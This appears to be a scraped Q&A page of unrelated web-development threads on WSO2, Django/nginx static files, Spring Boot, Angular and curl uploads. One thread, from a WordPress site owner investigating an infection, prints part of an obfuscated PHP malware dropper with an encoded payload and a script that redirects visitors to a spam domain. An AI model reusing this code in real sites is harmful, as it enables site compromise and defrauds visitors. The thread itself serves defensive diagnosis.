WSO2 API Manager is saving hundreds of 'publisher' HTML files (every day) to directory "/root"
All of the files have names like:
publisher.1
publisher.2
publisher.3
...
publisher.978
etc
How do I stop it from creating these files, or atleast how can I change the output directory for the files?
The contents of each file is HTML:
<!DOCTYPE html>
<html lang="en">
<head>
<script>
var requestURL = '/publisher';
var ssoEnabled = 'false';
var tenantDomain = 'null';
</script>
<title>API Publisher- Login</title>
<meta charset="UTF-8">
...
...
...
<script>
var siteRoot = '/publisher/site/themes/wso2';
</script>
<script type="text/javascript" src="/publisher/site/themes/wso2/libs/jquery.cookie.js"></script>
<script type="text/javascript" src="/publisher/site/themes/wso2/templates/utils/button-loader/jquery.buttonLoader.js"></script>
</body>
</html>
Looked in a bunch of config files, and in carbon management settings, but can't find anything that looks like it controls this.
Expect no html files to be saved at all to root directory.
By going through the file content you have given, It seems, it's a rendered output of a publisher page.
Because the following script tag is coming from the base template in WSO2 API Manager publisher app.
<script>
var requestURL = '/publisher';
var ssoEnabled = 'false';
var tenantDomain = 'null';
</script>
But there is no possibility to write the rendered HTML pages to /root/ directory or to anywhere else in the file system.
And also by default (In Unix systems), only root user has Read, Write permission to the /root/ directory. So unless you run a tool with root permission, It can't write files to the /root/ directory.
WSO2 API Manager does not need root permission to run nor it's recommended to start the server with superuser privileges.
So I think, this should have done by some external tool.
For example: If you have configured a health-check tool to GET a /publisher page and write the snapshot of the page to file system each time you perform the health check and if that is configured to write to /root/ directory this could have happened.
Can you check
Whether these files are created in equal time intervals
Who is the owner of these files (ls -lh)
And also check whether WSO2 API Manager is running with the same user who has created those files (ps -aux | grep wso2server).
Related
im having a hard time to display my static files on my webpages, im hosting my website on digitalocean ubuntu 18 and my static files are stored on the digitalocean space. initially everything was okay and working correctly until i added 3 new images to the server and ran the collectstatic command afterwards, note this was for the second time cause i ran it the first time to store the files in the digitalocean space folder i created. The collectstatic command shown me a warning saying
UserWarning: The default behavior of S3Boto3Storage is insecure and will change in django-storages 2.0. By default files and new buckets are saved with an ACL of 'public-read' (globally publicly readable). Version 2.0 will default to using the bucket's ACL. To opt into the new behavior set AWS_DEFAULT_ACL = None, otherwise to silence this warning explicitly set AWS_DEFAULT_ACL. "The default behavior of S3Boto3Storage is insecure and will change "
after i continue by typing yes, the files are images are successfully stored in the digital-space, but ever since i ran the collect command for the second time all staticfile are not displayed. I did some further reading about this warning and used the solution from AWS S3 and Django returns "An error occurred (AccessDenied) when calling the PutObject operation" but still nothing changed the warning went away but the staticfiles are still not found.
heres the error message from the chrome browser: Failed to load resource: the server responded with a status of 404 (Not Found)
have you ensured your settings display this:
STATIC_ROOT = os.path.join('static')
STATIC_URL = '/static/'
Following this, your templates should show the following:
<link rel="stylesheet" type="text/css" href="{% static '/locationofstatics/css/style.css' %}">
<link rel="stylesheet" type="text/css" href="{% static '/locationofstatics/css/bootstrap.css' %}">
The best way to go about things in my opinion is to only collecstatic locally and then push all of the local files and directories up to the server. What do you currently use to transfer files to the server side?
The other thing you need to do is ensure that Nginx has the location of your static files set within the sites-available file. From your ssh terminal (server side terminal) you can type:
sudo nano /etc/nginx/sites-available/projectname
Within this you need to add the location of your statics, for example:
server {
ocation /static/ {
root /home/name/projectname;
}
}
The following documents are extremely useful:
https://www.digitalocean.com/community/tutorials/how-to-set-up-django-with-postgres-nginx-and-gunicorn-on-ubuntu-16-04
https://www.digitalocean.com/community/tutorials/how-to-install-nginx-on-ubuntu-18-04
I was using nginx server in digitalocean for my django project.
front-end static files were working but admin not.
See my static files setting:
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
front-end css in static folder and collectstatic target folder is staticfiles
So our main focus is STATIC_ROOT means staticfiles folder. In nginx settings put "staticfiles" instead of "static" to set static file location.
Your STATIC_ROOT folder name could be anything you need to use that same name in nginx.
See below code for nginx setting:
location /staticfiles/ {
root /home/[your_username]/[your_project_folder];
}
[your_username]: which you are using to host your project on digitalocean.
The whole thing is that, you need to use your STATIC_ROOT folder in nginx setting.
Command to create/edit nginx setting is:
sudo nano /etc/nginx/sites-available/[your_project_folder]
I have a website and I am using Wordpress (latest version and all plugins updated) as CMS. Two days ago, Google Search Console team informed me about a virus on one of my posts. A cryptic subfolder named ZxmPeG placed in the wp-content folder has been identified and has the following content:
.63ec5597b4a4550c25cb25d4b6ba0186400c5cb5 with the content {"0":46,"4":122,"3":2}
.htaccess with the content DirectoryIndex index.php
<Files index.php>
order allow,deny
allow from all
</Files>
index.php with the content (only partial shown) <?php
class Rst { const PLATFORM_UNKNOWN = 0; const PLATFORM_ANDROID = 1; const PLATFORM_APPLE = 2; const PLATFORM_LINUX = 3; const PLATFORM_WINDOWS = 4; private $contentData = '7P0HQJPJ1j+Ox3Xt2AWkq4hKX3qHRRaQLiWEUBdCKIEQqaGz666gSJGWSF/pJBQJhACh7IqAJBQpASEEBAw99F7/ie7ee9/7lvve3/t+//f3/f/3g4d5nnlm5pw5c+Y8M/OMzPvuyx9fVXCPA/4O6oDjgMOjM4CTfxN3nEngY7/fXAIArjKDr5h0eHR0xIqyZD4DMsmCSUd/4v8KLOT/BvAFnPkaANi+0vSXlmXiNACgyKQLACeYE0xaWFr47y0EwMzFAZC4AAA81Ep1YZHiv0/yb3B0dPEfXv8Bwuff908B/hL2X/ty/V+F1/4Nty9WOfN75H8UsjHD9d/DP+J5OQEAP5aVswMAHMyAg/1L/N+HEr+Hkhz/cZjO8aV3ZP5+/98JbzPDF9cBgGpmRh0eAECEef8bx2dR/h3+qPcf/P4e/5lcf4S//V2+v9cnx98xZdX3GFMvAxxf9GLze/6/DyV/f/735fxx/4fe0v+Ov81/Uo9/hL/V939V3v/T8v8z/FEeq37MJvuLvT2K0OyQJlD+8JN/idf+O739gSiOL3a7wAy/AXyxv78t/xHPf33/v4U/yv0Df7QXi48Y4N/bj81/Ylf/CP/IHv/eLv8z/Hfr/5/x+0PP/6if/IE/2vHvw3/0/P9U+Ed7/SP5/9n2+c/wn5XH8s1WTAeaxhwOKDOt/gTgyjHA5zfKn/h/P67e0DIxtjAzMbyhg/CB+0pYQAP97iMCJaRu2PreuHaM/dgNFs6fP8/6/eXnPOv+Xy33n/hfAnOMd4xJXzHpLJN4mcTHJH4mCTDpBpNuMukuk+4xSZhJ4kySZJIUk2SYJMskhd/Hi1trTMxsbQ2u/YG+f3UN/38AJzncxr3sma1xHMbPHBqyu6mcQQE43E7fXgYATx+DPwB87cUk/9PHAOzHYSKwQsezp4/95bHl6WMnv9wALh6HsYr7yyPmFO6faNuDvxXpX3LzJ/4XwRqhnhUDSL1wOybw+r3kjdcf1W6+/uXELSYJvvjlxG0mCb0GADhfv//qOpPYXrz/6l8t8p/43wbLnXwHcP797uy/eXaR+TNzfOb4PyrjIuDr5WBmiPv67DLTTQBOfv2lKF/AuWVV5mUE4Afmz9eaLIPTYP46CWg6xgYQABwdY71+NI5fAlwC/Nh8hflUC+AE8Aa4MXN6A/yZ10wfBLi1wnrSxEz7PaCJKcsPxzSY5bMWBi4t/z7I/EEacGr5ITPF8a+fXyOWzHk+8dHpGVvymCoaPgKIHfti6t99Tqr79fc3eZZvMyP+PmX9sb/W6Njv9OL2F1plRR4GHoObEr2+krqUsbESib2V/1WexfufH0t+mzPBOZN4K1FI5Pbhj1cOP85Z6LUNvrdNkSj+0cYlbPzRj0Llrb4yxM2MX87f1gX4r4N/5EbeEs/6sUym9WH3ma/P9FwyGpBpKhJJmHU4MXDqp9Zz4cWTCaIuX5kqVYoJmioL9aZgPrib/xpOSA3KAhlzKgVx4mu3UjHa33sZL4XRDW/ZrZQTVc41vJ/lv/M9+Gklmift5yhuH6fXZDXG60dPZu5zoObbD8BWtkTpDK6RfTh9bJB/zN11daPS0AYrpc5pkj50GOT7QKMaqo7/pphvmEvm
If the link is directly accessed, a word document (extension .doc) is downloaded.
Next, in the root folder of the Wordpress installation, there is another cryptic html file named csvjsjd.html with the content
<html>
<head>
<script>
var fovxy = "n";
window.location.href = "https://newdiscount.zo" + fovxy + "e/?tr=13058";
</script>
</head>
<body>
</body>
</html>
<!-- 6c3f8b203473a9e45d8471d5072119a9 -->
If I delete the folder and files, they are recreated within a couple of minutes.
I have root access to my VPS and I have run the following tools to verify that no rootkit is installed:
Lynis
Chkrootkit
Rkhunter
My system is clean. I assume it is related to Wordpress only because once I stopped Apache2, the files are not recreated. Also, I have not found no other strange looking objects somewhere else on my Debian 9.9 machine.
I have tried to disable all WP plugins. The problem still remains.
Next, I used auditctl to watch the files. From the log file, I just could see that there are lot of foreign IP addresses accessing the files. But I was not able to identify the process which is responsible of creating those files.
Do you know any tools to trace the PHP script which is causing that malware?
Thanks a lot!
I have a spring boot application that contains static resources in the structure indicated below ( + indicates directories, - indicates files)
+ my-app
+ src
+ resources
+ static
+ v1
+ css
- app.css
- main.js
- index.html
I have sub-directory that contains the application bundles. By default, Spring looks for index.html directly under resources/static directory. It does not find one in this case.
My index.html looks something like this
<html>
<head>
<script type="text/javascript" src="main.js"></script>
<link type="text/css" href="css/app.css"/>
</head>
<body>
</body>
</html>
Let us assume the application is hosted at http://myapp.com.
I have two questions here
How can I make Spring to look for v1/index.html under my static resources, when I access the application the URL http://myapp.com?
If I load v1/index.htmlby adding a view controller in ViewControllerRegistry, it does load index.html under v1 directory, but gives 404 on all the resources used by index.html (main.js & css/app.css).
How can I tell Spring to get all resources from resources/static/v1, instead of resources/static.
I created a basic Spring Boot Project in STS and did not any dependencies. I used your html sample from above and modified it to this:
<html>
<head>
<script type="text/javascript" src="main.js"></script>
<link rel="stylesheet" type="text/css" href="/v1/css/app.css"/>
</head>
<body>
<h1>Hello World</h1>
</body>
</html>
I created the directory /src/resources/static/v1 and /src/resources/static/v1/css, placing the index.html file in the ../v1 directory which worked. The app.css file contained the following for testing purposes:
h1 {
color:red;
}
This worked without any configuration changes to Spring. If you are using Thymeleaf, JTwig, JSP... you may need to add resource handlers or tweak settings for those template engines, I can't comment since I didn't use a template engine based on your example. Anything in the /static directory will be referenced without the /static.
I hope that helps, if it does please mark the answer as the right answer.
I have an existing ASP.NET MVC web site. www.foo.com
I want to create a whole new sub system of our site using Angular2 and I want it to go under www.foo.com/NewSubSystem.
I have downloaded the Angular2 Cli from https://cli.angular.io/.
When I run from the command line
ng build -dev
The output has all the javascript script tags looking this in the index.html file
<script type="text/javascript" src="inline.bundle.js"></script>
<script type="text/javascript" src="styles.bundle.js"></script>
<script type="text/javascript" src="main.bundle.js"></script>
I need the scr="www.foo.com/NewSubSystem/inline.bundle.js"
NOTE: I have tried to update the baseURL in the tsconfig.json
"compilerOptions": {
"baseUrl": "www.foo.com/NewSubSystem"
}
but this does not seem to make any difference.
Any suggestions or pointers would be nice. Thanks
Set the index file baseref
base href="NewSubSystem/"
Then just code like its the root.
I reset the baseref to dist/ with javascript depending on the env sensed
Change your index.js files update
<base href="/<you base url>/">
if you are working with webpack:
You should also update the file config/webpack.common.js, so that you assets folder content can be hosted from your new baseurl.
...
const METADATA = {
title: 'ng2-admin - Angular 2 Admin Template',
description: 'Free Angular 2 and Bootstrap 4 Admin Template',
baseUrl: '/<you base url>/',
isDevServer: helpers.isWebpackDevServer()
};
.....
i have written a script to upload all the files from a specific folder in local to the host, but there was some issue and the files are not getting uploaded to the host.
#!/bin/sh
for i in /main/folder_1/path/*
do
curl -u Pass:"Uname" -T $i http://www.example.com/folder/path/$i
done
echo "*****File Uplodaed ******"
help me to solve this. the following is the error, that i got
<html>
<head>
<title> 500 Internal Server Error </title>
</head>
<body>
<h1>
Internal Server Error
</h1>
</body>
</html>
currently i am having the script inside /main/folder_2, if i change /main/folder_1/path/ to ../folder_1/path/, i got the output as the files are moved. but i want to run the script with the complete path specified.